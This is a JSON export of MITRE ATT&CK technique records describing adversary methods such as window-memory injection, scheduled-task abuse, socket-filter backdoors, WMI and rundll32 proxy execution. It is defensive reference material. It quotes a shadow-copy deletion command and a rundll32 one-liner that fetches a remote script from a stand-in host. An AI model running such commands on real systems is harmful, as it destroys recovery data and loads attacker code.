[{"technique_id":"T1055.011","technique_name":"Extra Window Memory Injection","technique_url":"https://attack.mitre.org/techniques/T1055/011","is_subtechnique":true,"parent_technique_id":"T1055","tactics":"privilege-escalation|stealth","tactic_count":2,"platforms":"Windows","platform_count":1,"description":"Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.","mitigation_ids":"M1040","mitigation_count":1,"detection_strategy_name":"Detection Strategy for Extra Window Memory (EWM) Injection on Windows","has_detection_strategy":true,"malware_use_count":2,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"2.0","created_date":"2020-01-14","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"2446db24db96"},{"technique_id":"T1053.005","technique_name":"Scheduled Task","technique_url":"https://attack.mitre.org/techniques/T1053/005","is_subtechnique":true,"parent_technique_id":"T1053","tactics":"execution|persistence|privilege-escalation","tactic_count":3,"platforms":"Windows","platform_count":1,"description":"Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)","mitigation_ids":"M1018|M1026|M1028|M1047","mitigation_count":4,"detection_strategy_name":"Detection of Suspicious Scheduled Task Creation and Execution on Windows","has_detection_strategy":true,"malware_use_count":115,"tool_use_count":9,"group_use_count":54,"campaign_use_count":12,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.8","created_date":"2019-11-27","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"3a8fba3c655e"},{"technique_id":"T1205.002","technique_name":"Socket Filters","technique_url":"https://attack.mitre.org/techniques/T1205/002","is_subtechnique":true,"parent_technique_id":"T1205","tactics":"command-and-control|persistence|stealth","tactic_count":3,"platforms":"Linux|Windows|macOS","platform_count":3,"description":"Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.","mitigation_ids":"M1037","mitigation_count":1,"detection_strategy_name":"Socket-filter trigger → on-host raw-socket activity → reverse connection (T1205.002)","has_detection_strategy":true,"malware_use_count":4,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"2.0","created_date":"2022-09-30","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"80e31428472a"},{"technique_id":"T1066","technique_name":"Indicator Removal from Tools","technique_url":"https://attack.mitre.org/techniques/T1066","is_subtechnique":false,"parent_technique_id":null,"tactics":"stealth","tactic_count":1,"platforms":"Linux|Windows|macOS","platform_count":3,"description":"If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":null,"has_detection_strategy":false,"malware_use_count":0,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":true,"is_deprecated":false,"superseded_by_id":"T1027.005","attack_version":"1.1","created_date":"2017-05-31","modified_date":"2026-04-14","collection_version":"Enterprise ATT&CK 19.2","row_hash":"a4aa6cf6d885"},{"technique_id":"T1560.001","technique_name":"Archive via Utility","technique_url":"https://attack.mitre.org/techniques/T1560/001","is_subtechnique":true,"parent_technique_id":"T1560","tactics":"collection","tactic_count":1,"platforms":"Linux|Windows|macOS","platform_count":3,"description":"Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. \n\nOn Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)","mitigation_ids":"M1047","mitigation_count":1,"detection_strategy_name":"Detect Archiving via Utility (T1560.001)","has_detection_strategy":true,"malware_use_count":31,"tool_use_count":5,"group_use_count":39,"campaign_use_count":11,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.3","created_date":"2020-02-20","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"3cf5adba2b05"},{"technique_id":"T1021.005","technique_name":"VNC","technique_url":"https://attack.mitre.org/techniques/T1021/005","is_subtechnique":true,"parent_technique_id":"T1021","tactics":"lateral-movement","tactic_count":1,"platforms":"Linux|Windows|macOS","platform_count":3,"description":"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)","mitigation_ids":"M1033|M1037|M1042|M1047","mitigation_count":4,"detection_strategy_name":"Behavioral Detection of Unauthorized VNC Remote Control Sessions","has_detection_strategy":true,"malware_use_count":7,"tool_use_count":0,"group_use_count":4,"campaign_use_count":0,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.2","created_date":"2020-02-11","modified_date":"2025-10-24","collection_version":"Enterprise ATT&CK 19.2","row_hash":"f41fa925144b"},{"technique_id":"T1047","technique_name":"Windows Management Instrumentation","technique_url":"https://attack.mitre.org/techniques/T1047","is_subtechnique":false,"parent_technique_id":null,"tactics":"execution","tactic_count":1,"platforms":"Windows","platform_count":1,"description":"Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)","mitigation_ids":"M1018|M1026|M1038|M1040","mitigation_count":4,"detection_strategy_name":"Behavioral Detection Strategy for WMI Execution Abuse on Windows","has_detection_strategy":true,"malware_use_count":84,"tool_use_count":9,"group_use_count":42,"campaign_use_count":12,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.6","created_date":"2017-05-31","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"820fc77932c2"},{"technique_id":"T1687","technique_name":"Exploitation for Defense Impairment","technique_url":"https://attack.mitre.org/techniques/T1687","is_subtechnique":false,"parent_technique_id":null,"tactics":"defense-impairment","tactic_count":1,"platforms":"IaaS|Linux|SaaS|Windows|macOS","platform_count":5,"description":"Adversaries may exploit vulnerabilities in security software, infrastructure, or defensive components to degrade, disable, or otherwise continue to impair their ability to prevent, detect, or respond to malicious activity. \n \nAdversaries may exploit a system or application vulnerability to directly interfere with defensive mechanisms. Exploitation occurs when an adversary takes advantage of a programming error in software, services, or the operating system to execute adversary-controlled code, often with the goal of weakening or disabling protections. \n\nVulnerabilities may exist in security tools such as antivirus, endpoint detection and response (EDR), firewalls, or other monitoring solutions. Adversaries may use prior reconnaissance or perform discovery activities (e.g., [Software Discovery](https://attack.mitre.org/techniques/T1518)) to identify defensive tools present in an environment and target them for exploitation. \n\nSuccessful exploitation may allow adversaries to terminate security processes, disable protections, bypass enforcement mechanisms, or reduce the effectiveness of defensive controls. In some cases, vulnerabilities in cloud-based or SaaS infrastructure may also be leveraged to bypass built-in security boundaries or disrupt visibility and enforcement across environments.(Citation: Salesforce zero-day in facebook phishing attack)","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":"Detection of Defense Impairment","has_detection_strategy":true,"malware_use_count":0,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.0","created_date":"2026-04-14","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"1e01eca26c25"},{"technique_id":"T1156","technique_name":"Malicious Shell Modification","technique_url":"https://attack.mitre.org/techniques/T1156","is_subtechnique":false,"parent_technique_id":null,"tactics":"persistence","tactic_count":1,"platforms":"Linux|macOS","platform_count":2,"description":"Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use <code>/etc/profile</code> when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> (Rocke) which are sourced when a user opens a command line interface or connects remotely. Adversaries often use ~/.bash_profile since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the <code>~/.bashrc</code> file (Tsunami, Rocke, Linux Rabbit, Magento) which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon), adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session(Pearl_shellbot). \n\nFor macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>. The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc<code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":null,"has_detection_strategy":false,"malware_use_count":0,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":true,"is_deprecated":false,"superseded_by_id":"T1546.004","attack_version":"1.2","created_date":"2017-12-14","modified_date":"2025-10-24","collection_version":"Enterprise ATT&CK 19.2","row_hash":"cc32cf1d26aa"},{"technique_id":"T1113","technique_name":"Screen Capture","technique_url":"https://attack.mitre.org/techniques/T1113","is_subtechnique":false,"parent_technique_id":null,"tactics":"collection","tactic_count":1,"platforms":"Linux|Windows|macOS","platform_count":3,"description":"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":"Detect Screen Capture via Commands and API Calls","has_detection_strategy":true,"malware_use_count":139,"tool_use_count":12,"group_use_count":19,"campaign_use_count":1,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.1","created_date":"2017-05-31","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"49dd598cb25a"},{"technique_id":"T1027.011","technique_name":"Fileless Storage","technique_url":"https://attack.mitre.org/techniques/T1027/011","is_subtechnique":true,"parent_technique_id":"T1027","tactics":"stealth","tactic_count":1,"platforms":"Linux|Windows","platform_count":2,"description":"Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless)","mitigation_ids":"M1047","mitigation_count":1,"detection_strategy_name":"Detection Strategy for Fileless Storage via Registry, WMI, and Shared Memory","has_detection_strategy":true,"malware_use_count":27,"tool_use_count":0,"group_use_count":2,"campaign_use_count":2,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"3.0","created_date":"2023-03-23","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"9896e5935565"},{"technique_id":"T1067","technique_name":"Bootkit","technique_url":"https://attack.mitre.org/techniques/T1067","is_subtechnique":false,"parent_technique_id":null,"tactics":"persistence","tactic_count":1,"platforms":"Linux|Windows","platform_count":2,"description":"A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)\n\nAdversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\n### Master Boot Record\nThe MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\n### Volume Boot Record\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":null,"has_detection_strategy":false,"malware_use_count":0,"tool_use_count":0,"group_use_count":0,"campaign_use_count":0,"is_revoked":true,"is_deprecated":false,"superseded_by_id":"T1542.003","attack_version":"1.1","created_date":"2017-05-31","modified_date":"2025-10-24","collection_version":"Enterprise ATT&CK 19.2","row_hash":"6dd101cfbc11"},{"technique_id":"T1037","technique_name":"Boot or Logon Initialization Scripts","technique_url":"https://attack.mitre.org/techniques/T1037","is_subtechnique":false,"parent_technique_id":null,"tactics":"persistence|privilege-escalation","tactic_count":2,"platforms":"ESXi|Linux|Network Devices|Windows|macOS","platform_count":5,"description":"Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.","mitigation_ids":"M1022|M1024","mitigation_count":2,"detection_strategy_name":"Boot or Logon Initialization Scripts Detection Strategy","has_detection_strategy":true,"malware_use_count":3,"tool_use_count":0,"group_use_count":4,"campaign_use_count":1,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"2.4","created_date":"2017-05-31","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"b85d01f80692"},{"technique_id":"T1557","technique_name":"Adversary-in-the-Middle","technique_url":"https://attack.mitre.org/techniques/T1557","is_subtechnique":false,"parent_technique_id":null,"tactics":"collection|credential-access","tactic_count":2,"platforms":"Linux|Network Devices|Windows|macOS","platform_count":4,"description":"Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1689)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).","mitigation_ids":"M1017|M1030|M1031|M1035|M1037|M1041|M1042","mitigation_count":7,"detection_strategy_name":"Detect Adversary-in-the-Middle via Network and Configuration Anomalies","has_detection_strategy":true,"malware_use_count":3,"tool_use_count":2,"group_use_count":3,"campaign_use_count":1,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"2.5","created_date":"2020-02-11","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"efc33a3b6673"},{"technique_id":"T1033","technique_name":"System Owner/User Discovery","technique_url":"https://attack.mitre.org/techniques/T1033","is_subtechnique":false,"parent_technique_id":null,"tactics":"discovery","tactic_count":1,"platforms":"Linux|Network Devices|Windows|macOS","platform_count":4,"description":"Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)","mitigation_ids":"","mitigation_count":0,"detection_strategy_name":"Behavioral Detection of User Discovery via Local and Remote Enumeration","has_detection_strategy":true,"malware_use_count":187,"tool_use_count":9,"group_use_count":40,"campaign_use_count":8,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.6","created_date":"2017-05-31","modified_date":"2026-05-12","collection_version":"Enterprise ATT&CK 19.2","row_hash":"8bbf5fad83c8"},{"technique_id":"T1583","technique_name":"Acquire Infrastructure","technique_url":"https://attack.mitre.org/techniques/T1583","is_subtechnique":false,"parent_technique_id":null,"tactics":"resource-development","tactic_count":1,"platforms":"PRE","platform_count":1,"description":"Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.","mitigation_ids":"M1056","mitigation_count":1,"detection_strategy_name":"Detection of Acquire Infrastructure","has_detection_strategy":true,"malware_use_count":0,"tool_use_count":0,"group_use_count":9,"campaign_use_count":0,"is_revoked":false,"is_deprecated":false,"superseded_by_id":null,"attack_version":"1.5","created_date":"2020-09-30","modified_date":"2025-10-24","collection_version":"Enterprise ATT&CK 19.2","row_hash":"6705a4bd35bf"},{"technique_id":"T1218.011","technique_name":"Rundll32","technique_url":"https://attack.mitre.org/techniques/T1218/011","is_subtechnique":true,"parent_technique_id":"T1218","tactics":"stealth","tactic_count":1,"platforms":"Windows","platform_count":1,"description":"Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>  This behavior has been seen used by malware such as Poweliks.(Citation: This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation: lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function 